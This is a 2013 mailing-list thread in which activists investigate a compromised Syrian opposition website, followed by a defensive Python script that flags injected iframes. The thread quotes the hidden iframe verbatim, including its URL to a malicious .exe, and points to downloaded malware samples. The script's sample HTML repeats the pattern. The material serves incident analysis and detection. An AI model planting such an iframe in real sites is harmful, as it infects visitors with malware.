Hello, I wrote a first summary on the case, I will try to keep it up to date with new data, https://words.ceops.eu/posts/Infected%20Syrian%20opposition%20website%20spreads%20malware%20to%20its%20visitors/
All the best,
KheOps

On 30/01/2013 00:00, SiNA Rabbani wrote:
>
> Hi!
>
> I sent the malware to a couple of friends that have a setup ready. If
> you want to try this it might be fun:
> http://docs.cuckoosandbox.org/en/latest/
>
> All the best,
> SiNA
>
>
> KheOps:
>> Hey,
>>
>> On 29/01/2013 23:34, SiNA Rabbani wrote:
>>> This is the malware:
>>>> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
>>
>> Yes, saw that too.
>>
>> However, I don't find any precise description of its behaviour. Like,
>> what it does, if it opens any port, sends data to a C&C or whatever.
>>
>> I have downloaded it there:
>> https://resources.telecomix.ceops.eu/material/malwares/
>>
>> All the best,
>>
>>> --SiNA
>>>
>>> SiNA Rabbani:
>>>> holy shit:
>>>>
>>>> <iframe name="I1" width="10" height="10"
>>>> src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
>>>> border="0"
>>>> frameborder="0">
>>>>
>>>> :/ if you are running windows don't even go there!!!
>>>>
>>>> Andrew Lewis:
>>>>> I can get to this in 6 hours or so, maybe someone is willing to
>>>>> jump on this before then?
>>>>>
>>>>> -Andrew
>>>>>
>>>>> On Jan 30, 2013, at 11:06 AM, KheOps <[email protected]> wrote:
>>>>>
>>>>>> Dear Libtech,
>>>>>>
>>>>>> We just saw that the website: http://www.syrian-martyrs.com
>>>>>> is probably compromised. Every page of the website contains an
>>>>>> iFrame which links to a .exe file which is detected as a virus
>>>>>> by antivirus software:
>>>>>> http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
>>>>>>
>>>>>> The fact that the HTML code is present at the bottom of each page makes
>>>>>> me think that the "index.php" page has been changed in a way
>>>>>> that makes that iFrame appear on every page of the website,
>>>>>> after the dynamic content.
>>>>>>
>>>>>> It also probably means that the attackers have some kind of
>>>>>> access to the server. My guess would be going to a PHP shell,
>>>>>> but I'm no expert in this.
>>>>>>
>>>>>> Any help, clue, investigation, would be very welcome :)
>>>>>>
>>>>>> Thank you, KheOps
>>>>>>
>>>>>> -- Unsubscribe, change to digest, or change password at:
>>>>>> https://mailman.stanford.edu/mailman/listinfo/liberationtech
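A defender-side check for the injection pattern the thread describes: a near-invisible iframe, appended after the dynamic content of every page, whose src points at an executable. This is an added example written for this page, not code from anyone in the thread; the sample HTML, the host names, the extension list and the scoring thresholds are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not taken from the compromised site): a legitimate
# embed inside <body>, then a tiny iframe appended after </body> that points
# at an .exe, mirroring the injection pattern described in the thread.
SAMPLE_HTML = """
<html><body>
<h1>News</h1>
<p>Regular page content.</p>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
</body></html>
<iframe name="I1" width="10" height="10"
 src="http://malware-host.invalid/downloads/uploads/software/ActiveX.exe"
 border="0" frameborder="0"></iframe>
"""

# Assumed list of file extensions that have no business being loaded in a frame.
EXECUTABLE_EXTENSIONS = (".exe", ".scr", ".msi", ".com", ".pif", ".bat")


def _to_int(value, default=0):
    """Parse an HTML size attribute, tolerating junk such as '10px' or None."""
    if value is None:
        return default
    match = re.match(r"\s*(\d+)", str(value))
    return int(match.group(1)) if match else default


class IframeCollector(HTMLParser):
    """Record every <iframe> with its attributes and line, plus where </body> closes."""

    def __init__(self):
        super().__init__()
        self.iframes = []          # list of (line_number, attrs_dict)
        self.body_close_line = None

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            # getpos() is taken before the parser advances past the tag,
            # so it is the line on which "<iframe" begins.
            self.iframes.append((self.getpos()[0], dict(attrs)))

    def handle_endtag(self, tag):
        if tag == "body" and self.body_close_line is None:
            self.body_close_line = self.getpos()[0]


def suspicious_iframes(html, site_host, max_hidden_px=20):
    """Return a list of findings for iframes that look injected.

    An iframe is reported when its src points to an executable, or when at
    least two weaker signals coincide: third-party host, near-invisible size,
    or placement after </body> (where appended payloads tend to land).
    """
    collector = IframeCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for line, attrs in collector.iframes:
        src = attrs.get("src") or ""
        parsed = urlparse(src)
        reasons = []
        if parsed.path.lower().endswith(EXECUTABLE_EXTENSIONS):
            reasons.append("src points to an executable")
        if parsed.hostname and parsed.hostname.lower() != site_host.lower():
            reasons.append("third-party host %s" % parsed.hostname)
        width, height = _to_int(attrs.get("width")), _to_int(attrs.get("height"))
        if 0 < width <= max_hidden_px and 0 < height <= max_hidden_px:
            reasons.append("tiny frame %dx%d" % (width, height))
        if collector.body_close_line is not None and line > collector.body_close_line:
            reasons.append("appears after </body>")
        executable = "src points to an executable" in reasons
        if executable or len(reasons) >= 2:
            findings.append({"line": line, "src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in suspicious_iframes(SAMPLE_HTML, "www.example-site.invalid"):
        print("line %d: %s" % (finding["line"], finding["src"]))
        for reason in finding["reasons"]:
            print("  - " + reason)
```

Feed it the HTML of each page as served by the site (fetched from a non-Windows host, or from a sandbox) together with the site's own hostname; a finding that repeats on every page, always past `</body>`, matches the "modified index.php or footer template" hypothesis in the thread and tells you which server-side file to diff against a clean backup.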
